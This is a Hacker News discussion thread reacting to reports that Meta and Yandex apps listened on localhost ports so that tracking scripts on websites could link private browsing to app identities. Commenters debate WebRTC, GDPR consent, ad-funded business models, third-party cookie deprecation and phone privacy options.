The other one, and this one gets you twice, is DMCA 1201. It's nominally about circumventing DRM but its actual purpose is that Hollywood wants to monopolize the playback devices, which is exactly the thing we're talking about. Someone wants to make an app where you can watch videos on any streaming service you subscribe to and make recommendations (but the recommendations might be to content on YouTube or another non-Hollywood service), or block ads etc. The content providers use the law to prevent this by sticking some DRM on the stream to make it illegal for a third party app to decrypt it. Facebook can do the same thing by claiming that other users' posts are "copyrighted works".
And then the same law is used by the phone platforms to lock users out of competing platforms and app stores. You want to make your competing phone platform and have it run existing Android apps, or use microG instead of Google Play, but now Netflix is broken and so is your bank app so normal people won't put up with that and the competition is thwarted. Then Facebook goes to the now-monopoly Google Play Store and has "unauthorized" third party Facebook readers removed.
These things should be illegal the other way around. Adversarial interoperability should be a right and thwarting it should be a crime, i.e. an antitrust violation.
> The problem is that FAANG have turned the concept of general computing on it's head by making every bloody handset a playground for the programmer with no easily grokkable interface to the user to curtail the worst behavior of technically savvy bad actors.
But how do you suppose that happened? Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
Fair. I see your angle now. 100% with you.
>Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
Besides every possible attempt being DoA because Google is intent on monopolizing the space with their TOS and OEM terms? There isn't a fork because it can't be Android if you do that sort of thing, and if you tried to it'd be you vs. Google. Nevermind the bloody rats nest of intentional one-sided architecture decisions done to ensure the modern smartphone is first and foremost a consumption device instead of a usable and configurable tool, which includes things like regulations around the base and processor, lawful interception/MITM capability, and meddling, as you mentioned, in the name of DMCA 1201.
Though there's an even more subtle reason why, too, and it's the lack of accessible system developer documentation, capability to write custom firmware, and architecture documentation. It's all NDA locked IP, and completely blobbed.
The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
> The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
Exactly. We have bad laws and therefore bad outcomes. To get better outcomes we need better laws.
What about "This website would like to connect to the Instagram App and may share your browsing history and other personal details."
Why should that message show up when I'm trying to make a video call in my browser? I'm just trying to call my nephew.
There are already permissions dialogs for using the camera/microphone. I don't think it'd be absurd to implicitly grant WebRTC permissions alongside that.
The website wants to connect to another computer|another app on your computer.
Most users probably will click "No" and this is a good choice.
>The website wants to connect to another computer|another app on your computer.
"website wants to connect to another computer" basically describes all websites. Do you really expect the average user to understand the difference? The exploit is also non-trivial either. SDP and TURN aren't privacy risks in and of themselves. They only pose risks when the server is set to localhost and with a cooperating app.
Pardon my ignorance, but modern browsers won't even load assets or iframes over plain http within an SSL page. So under normal circumstances you cannot open so much as an iframe to "localhost" from an https url unless you've configured https locally. Regardless of crossdomain perms. Wouldn't you want to require a special security permission from an app that was trying to setup a local server, AND require confirmation from a browser that was trying to connect to a local server?
HTTP isn't allowed on secure pages because the security of HTTP is known to be non-existent. WebRTC uses datagram TLS, which is approximately on par with HTTPS.
The thing that's happening here isn't really a problem with WebRTC. Compare this to having an app on your phone that listens on an arbitrary port and spits out a unique tracking ID to anything that connects. Does it matter if the connection is made using HTTP or HTTPS or WebRTC or something else? Not really. The actual problem is that you installed malware on your phone.
But that says nothing about the danger of identifying you.
> Most users probably will click "No"
Strong disagree. When I'm loading google.com is my computer not connecting to another computer? From a layman's perspective this is the basis of the internet doing what it does. Not to mention, the vast majority of users say yes to pretty much any permission prompt you put in front of them.
> The main application for WebRTC is peer to peer data transfer.
But not for the user.
The existing killer app for WebRTC is video chat without installing an app, which is huge.
Other P2P uses are very cool and interesting as well - abusing it for fingerprinting is just that, abusing a user-positive feature and twisting it for identification, just like a million other browser features.
You mean just like a million other "user-positive" browser features pushed by the biggest tracking company there is.
The technique doesn't actually rely on webrtc though, does it? Not showing up in the default view of chrome's network inspector obfuscates it a bit, but it's not like there aren't other ways to do what they're achieving here.
Because the decision makers don't care about privacy, they only want you to think that you have privacy, thus enabling even more spying. One solution is to not use the apps and websites from companies that are known to abuse WebRTC or something else.
This is not unique to WebRTC. The same result could be achieved by sending a http request to localhost. The only difference in this case is that using WebRTC doesn't log a http request
The browser could refuse to connect to localhost. I think there are browsers that refuse (i.e. to prevent attacking a router config interface).
I doubt anyone is running a browser on their router.
But still, you could do the same for stun, turn, sdp. Disallow local host.
That's literally what browsers have done (for STUN) and are working on (for TURN).
> 1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
I happened to be immune, I disabled Background App Refresh in iOS settings. All app notifications still work, except WhatsApp :(
https://forums.macrumors.com/threads/any-reason-to-use-backg...
> except whatsapp
> company checks out
Not totally following but it sounds like you are saying one of the things they have been doing involves abusing mandated GDPR cookie notices to secretly track people?
Yes? The cookie in question is First Party, which means you’ve consented to permitting only that party to track you using it, and not permitting its use for wider behavioral tracking across websites.
However, the locally hosted FB/Yandex listener receives all of these first party cookies, from all parties, and the OPs implication is (I think) that now these non-correlateable-by-consent first party cookies can be or are being used to track you across all sites that use them.
Not only did you only consent to the one party using it, but the browser has robust protections in place to ensure that these cookies are only usable by that party. This “hack” gets around the restriction completely, leveraging a local service to aggregate all the cookies across sites.
This is why things involving cookies for permission to do things were really poison pills. As long as there is a cookie to be tracked, any at all, you have the data exfil/tracking problem. Only thing that changes is where the aggregation happens.
IANAL, but it's not GDPR-conformant consent in any way. Consent needs to be informed, unambiguous, and freely given to be valid and should be easy to reject. The only way for this to be valid would be a consent form with something like:
Allow Meta tracking to connect the Facebook or Instagram app on your device to associate visits to this website with your Meta account. Yes/No (With No selected as a default.)
I am pretty sure that this is a grave violation of the GDPR.
That's probably already part of the consent form websites pop up listing 200 different trackers. If you permit data sharing with Facebook/IG/Meta in the consent form, you're consenting to tracking in general, not just cookie-based tracking.
"No" doesn't even need to be selected as a default, as long as you don't use dark patterns. Making the user manually click yes or no is perfectly valid (as long as you don't make "yes" easier than "no", so if you add an "allow all" button there should be an equally prominent "deny all" button).
Which, on the face of it, sounds like a violation of the GDPR...
The intent of these laws is just so obtuse and unclear! And beyond that complying is technically impossible to implement but you could only understand that if you were a rocket scientist PhD computer science wizkid making $$$$k in California which isn't that much in such a high cost of living area donchaknow. /sardonic
>abusing mandated GDPR cookie notices to secretly track people?
How does that even work? What can GDPR cookie notices can do that the typical tracker can't do?
The cookie preference pop-up is a cookie. To track your preference, they need a cookie. We legally mandated a cookie. They're using the cookie regardless. But no one will call them on it until a critical mass is reached to get cases in a sufficiently large number of jurisdictions to curtail the behavior.
A reminder that it's possible to use tools like XPL-EX to circumvent those attempts. Also ad blocking via adaway would do the trick here I assume, as it should block Meta Pixel tracking. Overall, awful approach.
> User logged into FB or IG app. The app runs in background
So a takeaway is to avoid having Facebook or Instagram apps on your phone. I'm happy to continue to not have them.
Any others? e.g. WhatsApp. Sadly, I find this one a necessary communication tool for family and business in certain countries.
I wish we could just ban advertising and tracking on the internet. I feel like so much crap these days has come out of it, all so that CEOs can afford an extra yacht
It's already enough to just have plain ads. Like we have them on the streets, at the bus station, newspapers, etc. No tracking needed at all, just give out the message. If you need to target people to it in the context of the place or content you are showing it with. But you don't need to know anything about the user seeing the ad. Targeting by user doesn't work anyway.
> Targeting by user doesn't work anyway.
How did you reach this conclusion? The main problem is that it works way better than traditional marketing medium.
It's the reason Google and Facebook are so massive, why would publishers choose to pay them if it doesn't work?
I've seen it being used.
Like on the frontend side with Facebook which thinks if I'm interested into cycling I will also be interested in cars (both are on the street, right?) or if I'm interested in some more dirty humor I also want to see more "naughty" stuff.
And also on the backend used by magazines and they mostly don't use the user profiles because it's too targeted and doesn't have enough audience. And if you make the targeting broad enough you'll have again people interested in chocolate so you target them with wine and whiskey.
Or even better on Amazon where you can buy a new TV and when you have done so it will suggest you even more TVs for the next months.
> why would publishers choose to pay them if it doesn't work?
Because they believe it works and it's impossible to prove otherwise?
By the same logic cigarettes are presumptively beneficial...
https://www.youtube.com/watch?v=ESoYS9SZW-4
Depending on the data you collect, targeting by user - unfortunately - works. If the granularity is not one user, it will be a hundred. If not, a thousand, and so on. I've seen apps run ads targeting a total of 5 cohorts(together holding a hundred million users), and I've seen companies run ads targeting 100s of cohorts with the same number of users. They all work better than no targeting at all.
However what you're saying isn't completely wrong. I've also seen user targeting become a self-fulfilling prophecy. What happens is that it's championed by a high level executive as the panacea for improving revenue, implemented, and seen to not work. Now, as we all now, the C*O is Always Correct, so everything else around it is modified until the user-level targeting A/B test shows positive results. Usually this ends up in the product being tortured into an unusable mess.
Before you target 5 different cohorts it's better to target the context of where the ad is shown. i.e. web content normally already has a category and people reading an article about cheap flats in a city might be very much interested in renting or buying a flat. By collecting signals on a user you might only get that interested after a longer time, if you even have a profile, and by the time you pick it up they might have a new flat and are no longer interested.
Yes definitely. User level targeting comes after targeting particular ad spaces in some ad platforms. But it still adds enough marginally to be useful.
I don't think it has to go that far. I think there's a middle ground here that people would accept: show us ads, but make it a one-way firehose, like TV and billboards. If you need to advertise to pay for the site, put up all the banners you want. But don't try to single me out for a specific one.
If it could pay for network TV there's no reason it can't pay for a website.
(You could still do audience-level tracking, e.g. "Facbebook and NCIS are both for old people, so advertise cruises and geriatric health services on those properties")
Reddit has fairly extensive device fingerprinting. And they are selling data for training AI models. It's only a matter of time before there is some premium phone app that monetizes data that otherwise isn't available/for sale.
This type of thing is pure greed, completely distinct from a highly aggressive pursuit of far more lucrative opportunities that average businessmen have been able to accomplish in the extreme interest of their shareholders.
Those true leaders are the traditional examples who have shown success over the centuries, without letting any greed whatsoever become a dominant force, recognizing and moving in the opposite direction from those driven by overblown self-interest, who naturally have little else to offer. It can be really disgraceful these days but people don't seem to care any more.
That's one thing that made them average businessmen though.
Now if you're below-average I understand, but most companies' shareholders would be better off with a non-greedy CEO, who outperforms by steering away from underhanded low-class behavior instead.
Now if greed is the only thing on the table, and somebody like a CEO or decision-making executive hammers away using his only little tool with admirable perseverance long enough, it does seem to have a likelihood of bringing in money that would not have otherwise come in.
This can be leveraged too, by sometimes even greedier forces.
All you can do is laugh, those shareholders might be satisfied, but just imagine what an average person could do with that kind of resources. It would put the greedy cretins to shame on their own terms.
And if you could find an honest above-average CEO, woo hoo !
The majority of internet users are either unwilling or unable to pay for content, and so far advertising has been the best business model to allow these users to access content without paying. Do you have a better suggestion?
They are able, because in the end advertising is also paid by customers. The complications are:
- Paying for services is very visible, whereas the payment for advertising is so indirect that you do not feel like you are paying for it.
- The payments for advertising are not uniformly distributed, people with more disposable income most likely pay more of overall advertising. But subscriptions cannot make distinctions between income.
- People with disposable income are typically the most willing to pay for services. However, they are also the most interesting to advertisers. For this reason, payment in place of ads is often not an option at all, because it is not attractive to websites/services.
I think banning advertising would be good. But I think a first step towards that would be completely banning tracking. That would make advertisements less effective (and consequently less valuable) and would pose services to look for other streams of income. Plus it would solve the privacy issue of advertising.
This!
It's a game. When a merchant signs up to an ad platform (or when the platform is in need of volume), they are given good ROI, and the merchant also plays along and treats it as "marketing expenditure". Eventually, the ROI dries up i.e the marketing has saturated and the merchant starts counting it as a cost and passes it onto the customer. I don't know if this is actually done, but it's also trivial for an ad platform to force merchants to continue ads by making them feel it's important: when they reduce their ad volume, just boost the ROI and visibility for their competitors (a competitor can be detected purely by shared ad space no need to do any separate tagging). Heck, this is probably what whatever optimization algorithm they are running will end up suggesting as it's a local minima in feature space.
And yes, instead of banning ads, which would be too wide a legal net to be feasible, banning tracking is better. However, even this is complicated. For example, N websites can have legitimate uses for N browser features. But it turns out any M of the N features can be used to uniquely identify you. Oops. What can you even do about that, legally speaking? Don't say permissions most people I know just click allow on all of them.
Internet users pay for their services by everything they buy being more expensive due to the producers having to cover the advertising expenses.
I think that might be a rhetorical device bequeathed to you by the social media companies.
People of course do pay for things all the time. It’s just the social media folks found a way to make a lot more money than people would otherwise pay, through advertising. And in this situation, through illegal advertising.
The best thing we can all do is refuse to work for Meta. If good engineers did that, there would be no Meta. Problem solved. But it seems many engineers prefer it this way.
Sure, this entire business model has been cataclysmic for traditional media organizations and news outlets and peoples trust in institutions has plummeted in correlation, so, let’s just fucking scrap it and go back to payed media.
"Traditional media organizations" have been primarily funded by advertising longer than anyone on HN has been alive.
Some of them; perhaps even a vast majority. But this isn't the only option nor do we have to continue for it to be so.
Manufacturing consent identified advertisement as one of its five filters and was published in 1988. It is and was extremely rare for a magazine or news paper to not be at least partially funded by advertisements.
I don't pay for network TV but it still gets produced
And it is funded by ads, what's your point?
Those ads don't track me
https://en.m.wikipedia.org/wiki/ATSC_3.0#Privacy
And if they eventually get rid of the legacy requirement I'll complain
>The majority of internet users are either unwilling or unable to pay for content
Except for Spotify, News subscriptions, videogame subscriptions, video streaming services, duolingo, donations, gofundmes, piracy services!, clothing and food subscriptions! etc etc
People pay $10 for a new fortnite skin. You really pretending they won't pay for content?
People were willing to pay for stuff on the internet even when you could only do so by calling someone up and reading off your credit card number and just trusting a stranger.
Meanwhile, the norm until cable television for "free" things like news was that you either paid, or you went to the library to read it for free.
Maybe people could visit libraries more again.
The question is how do you ban it, and then how do you prove that people are breaking those rules?
By defining the $thing, banning the $thing per definition by law, and then tasking FBI-like organization enforce the law? It won't completely go away but it will subside, like how gambling on Internet is divided binary and confined into lootbox games without cashing features and straight up scam underground casinos.
Personally I think we should start from separating good old ads(that existed before I was 15) and Internet "ads". The old ads were still somewhat heavily targeted, but less than it is now. There probably would be an agreeable line up to which level advertisement efforts can be perverted.
I mean the comparison of ‘old’ ads vs new ads is interesting in itself, old ads already abide by far more regulation and are far more auditable. Simply bringing digital ads in line would be a big step forward.
Some examples:
In most countries it’s illegal to ‘target minors’ and there’s restrictions on what ads can run on after school hours. Meta has always allowed age targeting down to 13 and has no time of day restrictions.
In parts of New Zealand you can’t advertise alcohol between 10PM and 9AM… unless you do it on Meta or Google.
Most countries have regulation about promoting casinos (or the inability to) unless they’re digital casinos being promoted in digital ads.
Or just look at the deepfake finance and crypto ads that run on Meta and X. Meta requires 24 strikes against an advertiser before they pull them down, if a TV network ran just one ad like that it would be a scandal.
Audit-ability is the biggest issue imo. If a TV ad runs we can all see it at the same time and know it ran. That is simply impossible with digital ads, and even when Meta releases some tools for auditing the caveat is that you still have to trust what they’re releasing. Similarly with data protection there’s no way to truly audit what they’re doing unless you install government agencies in the companies to provide oversight, and I don’t see how you could really make that work.
It would be nice if they also couldn't target us with more information than what we consent to give them. Like, fine, if you want to target facebook ads at people using details they've filled in, I can see that being acceptable, but trying to scrape every single byte of data about us and using that to throw targeted ads at us feels icky.
Better moderation of crappy AI-generated image ads that are just scamming you would be nice as well.
Yes - although I disagree on one point.
All we need to do is define the $thing and mandate that lawsuits can be effective.
No agency enforces that potato chips need to fill up 92% of the bag or whatever, or that McDonalds cannot show pictures of apple fritters with more apples than they actually come with (this happened).
You just incentivize a cottage industry of legal that can squeeze a profit out of suing peanut butter companies for labelling incorrectly, or advertising dishonestly and it sort of takes care of itself.
I think the main problem is lots of money are made from it, and money influences politics hugely. The technical difficulties are low on the list of reasons this is not happening.
https://news.ycombinator.com/item?id=43595269
I like the idea, but where do you draw the line on what advertising is.
Is affiliate marketing still allowed? Are influencers allowed to take payment? Can people be a spokesperson for a company? Can newspapers run commentary about businesses? Can companies pay to be vendors at a conference?
No matter where you end up drawing the line you’re just shifting the problems somewhere else. Look at the amount of money Meta and Google make, the incentive is just too large.
I know. It's wishful thinking that will never become a reality. I pray for a solarpunk future in the same way
It's impossible and we all know it. Instead, donate or help with the huge adblock lists that are being maintained by a lot of people
A lot of things I would have previously said were impossible have happened in the last half year. If only a few of those things were of the impossibly good type.
As said in a reply to a sibling comment, I am very aware. This is wishful thinking
>all so that CEOs can afford an extra yacht
...and so consumers can use services/products without having to fork over money.
People love the ad-model. Given the option to pay or use the "ad-supported" option, the ad-supported one wins 10 to 1. This means in many cases it doesn't even make sense to have a paid option, because the ad option is just so much more popular.
As bad as crypto is, with all the negative things attached to it, BAT was probably one of the smartest things to be invented. A browser token that automatically dispenses micropayments to websites you visit. Forget all the details to get snagged on, the basic premise is solid: Pay for what you use. You become the customer, not the advertisers.
Also a note about ad-blocking - it only makes the problem worse. It is not a "stick it to the man" protest. You protest things by boycotting them, or paying their competitors, not by using them without compensating them.
There is no such thing as a free lunch. Consumers on average are forking over the money. Otherwise no one would pay for advertising. And they are paying more than they would have otherwise since this dystopian tracking apparatus isn't free either.
Yes, we need ads for a free internet, today. And, as a result, we also have our privacy eroded - eroded in ways we may not care about today, but will probably regret tomorrow.
If we must pay for the internet, give me an option to pay to use it where I see no ads and my privacy is preserved. Let me know what that cost is and I'll decide what I want to do.
Right now, the actual pricing is obscured so we just "accept" that the internet in its current form is how it needs to be.
>give me an option to pay
This will depress ad revenue as the people with the most money will be the people who pay to remove ads. This will make less sites and content viable.
Ok?
Not every site needs to reach 1 billion people.
Plus Wikipedia seems to be doing ok occasionally asking for donations.
I really liked the concept of BAT but the reality left me wanting.
Things like "we'll hang on to the tokens of sites that don't use BAT yet for them until they join" gave negative vibes.
It all felt a little underbaked. I swing back to Brave once in a blue moon and then remember I've got at least $20's worth of BAT lost forever somewhere.
I'm not a big fan of it or anything, it's just the only crypto I know that was targeting that idea.
I'd love if there was another one that was totally open and just a browser extension away. But I do not think it would ever get off the ground because...
People love the ad model and hate paying for things.
The deprecation of third-party cookies, that all browsers were at one point on track to implement, was pretty much the most realistic first step to that. Which is why Google killed it last year by leveraging their control over Chrome.
While not technically a crime, it was a disgusting, unethical market manipulation move that never really got the public outrage it deserved.
Google execs’ initial support for it was also telling: leadership at Google must literally thought they would find another way to stay as profitable as they are without third-party cookies. Put another way: Google leadership didn’t understand cookies as well as someone who’s taken a single undergrad web dev class. (Or they were lying all along, and always planned to “renege” on third-party cookie deprecation.)
I don't think that's quite what happened. Google got in anti-trust trouble because they have an unfair advantage in user-tracking, given logged in Chrome accounts. Removing third-party cookies hurts other privacy-invading companies without substantially affecting Google. It was still somewhat on track to be removed from Chrome until they lost their antitrust battle, and Chrome was required to be spun off. With Chrome's new future, and Google's new legal constraints, there's less incentive to try and make Privacy Sandbox work. At least, that was my understanding; I didn't follow it all that closely.
This is very misleading. Google was prevented from disabling third-party cookies due to intervention by the CMA, who felt it would provide an unfair advantage over other advertisers. Google argued their case for years, proposed competing standards to act as a replacement (see Topics API), and eventually gave up on the endeavour altogether and simply made it a user toggle.
Google gets no competitive advantage from removing third party cookies from chrome. The anticompetitive monopolistic tactic was the plan to replace third party cookies with FLoC/Privacy Sandbox/Topics AI, and THAT is what they were not prevented from doing.
No one is trying to stop google from removing third party cookies. Google is just unwilling to remove them without introducing a new anticompetitive tracking tool to replace them.
> No one is trying to stop google from removing third party cookies.
That's simply not true. As I already mentioned, the CMA presented a legal challenge which you can read about online. Please review the history, as it's been going on for years now.
https://www.gov.uk/government/news/cma-to-have-key-oversight...
https://www.marketing-beat.co.uk/2024/02/06/cma-cookies-goog...
The first link confirms exactly what I said above. They’re not preventing Google from removing third party cookies, they’re preventing Google from implementing ALTERNATIVES to third party cookies. The only reason Google is unwilling to straight up remove third party cookies is their business model.
The second link does contain the phrase “cannot proceed with third-party cookie deprecation”, but it’s simply obvious that it’s not about third party cookies per se. It’s all about Google’s (unnecessary, anticompetitive, anti-user, anti-privacy) replacements for third party cookies.It is true that the CMA is concerned with the new API proposals within the Privacy Sandbox such as Topics. However, this is from an anti-competitive angle, rather than privacy. Their goal is to ensure market fairness.
As part of that same process, they have put considerable friction in place for removing third-party cookies. They've deemed that the removal of third-party cookies could give Google an unfair market advantage, and that is why they're concerned with finding an alternative solution to replace them. This has been a very slow process, and involves many discussions and debates with regulators. That has had significant influence on the design of the Topics API.
To provide a more direct example, the CMA have also put specific stalls into the deprecation process, such as the standstill period invoked last year:
> The CMA will start a formal review of Google’s plan to deprecate cookies and Chrome’s Privacy Sandbox replacements once Google triggers a 60-day standstill period, likely at the beginning of the third quarter. During this standstill, the tech giant is forbidden to put in motion any deprecation procedures on Chrome. ... If they can’t reach an agreement, the 60-day standstill period will become 120 days.
https://www.adweek.com/programmatic/the-cma-is-prepared-to-d...
To put it simply, third-party cookies would have been dead and buried long ago if this dispute were not happening. It may be possible for Google to remove third-party cookies without a replacement, but they'd have be risking a significant lawsuit and contravention of UK authority by doing so.
Insidiously calling it "Privacy sandbox", and now setting everything opt-in every time I login to Chrome is really not Googly.
Most commenters on Hacker News hated Google’s plan and hoped it would fail. Were they wrong?
It seems like damned-if-you-do, damned-if-you-don’t.
That stemmed from “dammit Google now every SaaS developer has to work nights to meet your arbitrary deadline”; here we’re caring more about the impact as consumers. It’s ok to think about things in two ways.
source: a developer who actually did have to do this (and did it, and now didn’t have to, but it’s done)
Didn't have to? Don't you need to support users on Firefox and Safari?
Actual report: https://localmess.github.io/
>Google says it's investigating the abuse
That's a bit ironic, considering how they're using any side channel they could lay their hands on (e.g. Wi-Fi AP names) to track everyone. Basically every large app vendor with multiple apps does something similar to circumvent OS restrictions as well.
if it were a small company, it'd have been dilisted from google's play store in an instant.
The EU should set some record breaking fines for this.
Maybe it's time to invent a tax that starts at 0% and goes up 1-X% every time your hand is cought in the cookie jar. And add a corresponding website where you can clearly see all violations by company.
There should also be fines, but individuals have gone to jail for less.
I agree they should. But I don't think the EU has any real ability to send American tech execs to jail. At most they can stop them doing business in the EU.
I think mutual criminality is satisfied, so extradition is definitely possible.
Meta makes $70 billion net per year, after fines.
Another reason not to install big tech's apps and only use their websites if you must.
Not only our their websites painful which discourages use, websites are more sandboxed.
I am not sure which Meta apps open ports, but e.g. Samsung phones come with a bunch of Meta apps pre-shipped. IIRC just removing the Facebook app is is not enough, there is another service installed that is not visible as an app (com.facebook.services etc.), which you can only uninstall from the data partition with something like ADB/UAD.
Or buy an iPhone or a Pixel.
I remember a few years ago analyzing a modern Samsung phone's web traffic. It had by far the most ad-related and monetizing connections out of any other phone I've ever seen. And they were part of "necessary" functions, so you couldn't just block that traffic.
Samsung has great tech, but I avoid because it's so bloated and abusive.
My Samsung phone has Netflix, Spotify, and some Microsoft stuff installed, but nothing from Meta.
I think Samsung stopped preinstalling Facebook's weird services a while back. Xiaomi still seems to be shipping Facebook last time I checked, though.
Even outside of Samsung a lot of "normal" apps come packed with Facebook crap because of Facebook's SDK (for the "log in with Facebook" button). There was that one incident where many/most iOS apps didn't open anymore because Meta fucked something up on their servers that crashed every app with the Facebook SDK inside of it (https://www.wired.com/story/facebook-sdk-ios-apps-spotify-ti...).
The Pixel "Private Space" feature should prevent Meta apps from running in the background. It also prevents you from getting notifications.
I tend to buy stock Android, e.g. Motorola moto g30, etc. It still has lots of Google stuff, but you can get rid of them, and I have a work profile specifically designed for Google-related stuff, and my personal profile is de-Googled as much as possible.
I would recommend everyone who wants a clean Android to look into Google Pixel phones. Aside from being mostly bloat-free (and most bloat can be uninstalled), it is one of the few phones that supports unlocking/relocking and a secure open source alternative (GrapheneOS).
Does grapheneos prevent this? In what way? I know apps like ShareViaHTTP [1] are able to open ports (listening not just on the loopback address). If I installed a meta app, could it still run its listener that scripts on webpages could talk to?
[1]: https://f-droid.org/packages/com.MarcosDiez.shareviahttp
I didn't say that. Only that GrapheneOS does not come with any adware/malware preinstalled. That said, their default browser did block one of the attack vectors:
https://grapheneos.social/@GrapheneOS/114620254209885149
Article did mention Facebook and Instagram at some versions.
Samsung devices are loaded with malware and AI slop in general. I'd avoid them if you at all care about privacy. Since Google is still missing end to end encryption for cloud data, iOS seems like the only good choice currently.
iOS sends data to metrics.apple.com, metrics.icloud.com, iadsdk.apple.com, etc. a lot. They are much better than Samsung (who send data to Samsung and other parties), but I am not convinced they are much better than Google devices. It's more who you prefer sending your data to.
In the end something like GrapheneOS is the only good choice. Has all the security features of Pixel (which is similar to iPhone) and the tracking of neither.
Not all metrics are equal. I don't really care if Apple collects anonomized data on which features are most used or collects crash reports. That's worlds away from using preinstalled apps to backdoor your phone to provide tracking scripts your details in incognito mode.
> Not only our their websites painful which discourages use, websites are more sandboxed.
This isn't remotely true. It is pretty trivial for a well-resourced engineering organization to generate unique fingerprints of users with common browser features.
Wouldn't native apps be even worse in that regard, most of the time?
Would an individual using this technique to collect information from someone else's computer possibly face prosecution under the Computer Fraud and Abuse act?
People have been prosecuted under that act for clicking "view source" on their web browser. The crime itself is irrelevant. It's more about who you are/what connections you have/who you piss off.
Has there actually been a conviction purely for "viewing source"?
That was a real news story. A journalist looked at the state's educator-credentials checker, viewed the source and saw it had teacher's SSNs in base64 somewhere in the plaintext. Missouri Governor Mike Parson then tried to legally threaten the journalist. Honestly, if this case wasn't as high-profile, I think he might have got a conviction, at least in state court.
https://www.theregister.com/2022/02/15/missouri_html_hacking...
exactly, the more interesting question: would anyone be willing to prosecute a Meta executive over this? Sadly, I expect no.
This only works if you control the code on both sides (ie. on the website being visited and an app running on the phone). It's not some sort of magic hack that allows you to exfiltrate arbitrary browser history. Therefore it's unclear how it can be construed as "hacking" in any meaningful way. As bad non-consensual tracking done by google/meta/whatever are, it's not covered under CFAA.
I agree it's not hacking, but the Computer Fraud and Abuse act seems to have a pretty broad definition of computer fraud and abuse. In particular, the technique seems like it might (emphasis mine) "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value …". Would the other person have a reasonable belief that they didn't authorize access to information which their OS attempts to prevent access to?
I'm not a lawyer, so my question is genuine.
I don't know, you're purposefully abusing oversights to completely bypass the sandbox. It's an exploit for sure in my mind, and it seems very intentionally done. Like, it was done this way specifically because it allows them to circumvent other protections they know existed.
The yandex one uses client/browser-side code to exfiltrate; it’s within the realm of possibility to abuse this, given a user visits a site under your control.
On the FB side, I can see a malicious user potentially poisoning a target site visitors’s ad profile or even social media algorithm with crafted cookies. Fill their feed with diaper ads or something.
Yes
Two ways to f#ck with these trackers - either send them nothing back, or flood them with lots of fake data.
Somebody also needs to come up with a way to peer to peer share advertiser tracking cookies.
Can this cross profiles? That would be a big security issue for corps.
Quick test and if I serve on 8080 on the Userland app it can be accessed from both profiles. So probably yes.
This means an infected app on your personal profile could exchange data with a site visited from a second profile.
Only if that site specifically communicates with an (unauthenticated) service bound to a local port though, right?
Which, per the OP, the site would be doing by merely including the Meta pixel, which practically every e-commerce and news site does to track its campaigns and organic traffic.
The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity in that app for an unknown amount of time. And even with the tracking code deactivated, cookies may still persist on those secondary profiles that still allow for linking future activity.
Yes, but if the concern is not mixing business and personal compartment of the phone, business sites would hopefully not embed a Meta tracking pixel.
> The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity
Definitely, and that's a huge problem. I just don't think Android business profiles are a particular concern here; leaking app state to random websites in any profile is the problem.
Or do Android "business profiles" also include browser sessions? Then this would be indeed a cross-compartment leak. I'm not too familiar with Android's compartment model; iOS unfortunately doesn't offer sandboxing between environments that way.
While I agree with your reasoning, in my experience any statement where I prepend "hopefully" usually ends up being the worst possible interpretation in practice.
What I mean is: If a corporate internal website regularly connects to unauthenticated local ports and leaks sensitive data out, that's fully on them.
If they are trying to fingerprint the "private compartment" of a BYOB device, that seems roughly as bad as a non-corporate side doing the same.
100% agree, and fingerprinting BYOB devices would be problematic in a lot of ways.
I'm generally against BYOD programs. They're convenient but usually come from a place of allowing employees access to things without the willingness to take on the cost (both in corp devices and inconvenience of a second phone/tablet/whatever) to run them with a high level of assurance.
Much better in my opinion to use something like PagerDuty or text/push notifications to prompt folks to check a corp device if they have alerts/new emails/whatever.
You can easily click a link e.g. to a blog post on Chrome inside your profile.
E.g. a Jira ticket links to a post on how to do something concurrency related in Python.
I get your point thought that maybe this is no worse than if they visit the site on the personal side.
However I wouldn't trust out lack of imagination on how to exploit this to be happy about the security gap!
> do Android "business profiles" also include browser sessions
I believe that is typical.
My business profile has it's own instance of Chrome. Mostly used for internal and external sites that require corporate SSO or client certificates. Of course it could be used to browse anything.
webrtc was supposed to be for real-time comms, not fingerprinting people based on what random apps they have running on localhost. the fact that a browser sandbox still leaks this info is wild. like, you’re telling me port 43800 says more about me than a cookie ever could? and of course, this all runs under the radar—no prompt, no opt-in, just “oh hey, we’re just scanning your machine real quick.” insane. might as well call it metascan™.
kinda makes me nostalgic for simpler times—when tracking meant throwing 200 trackers into a <script> tag and hoping one stuck. now it’s full-on black ops.
i swear, i’m two updates away from running every browser in a docker container inside a faraday cage.
Well, primarily it's the other apps that are saying a lot about you. I think this story emphasises yet again that websites are better for your privacy than apps. (Especially in a browser that has e.g. uBlock Origin, such as Firefox for Android.)
The person working on Arcan runs the browser on a separate machine via Remote Desktop with it set to wipe and re-image itself between sessions.
crazy
Yes but I kinda love it. Perfectly safe from any future Rowhammer type exploit.
> webrtc was supposed to be for real-time comms, not fingerprinting people based on what random apps they have running on localhost
Native Apps are doing that, not webrtc. Just prove the web is safer and all that BS about native apps being better is, well, BS.
Does the Yandex HTTPS one mean they're shipping the private key for their cert in the app, therefore anything running on localhost (or on a network with poisoned DNS) can spoof the yandexmetrica site?
There is a cert for it in the logs: https://crt.sh/?q=yandexmetrica.com
Yes, but presumably they aren't hosting anything on yandexmetrica.com, so any attackeright as wel register yandexmetrica.net and get an ssl cert for that.
These sites both have the same potential for abuse.
Yup definitely. Edit: the diagram makes it perfectly clear https://yandexmetrica.com:30103/p?...
It even looks like some of the certs were issued by Yandex to Yandex. I guess their cert division will end up writing an incident report for this.
All apps + the web browser being able to communicate freely over a shared localhost interface is such a glaring security hole that I'm surprised both iOS and Android allow it. What even is a legitimate use case for an app starting a local web server?
> What even is a legitimate use case for an app starting a local web server?
There are apps on iOS that act as shared drives that you can attach via WebDAV. This requires listening on a port for inbound WebDAV (HTTP) requests.
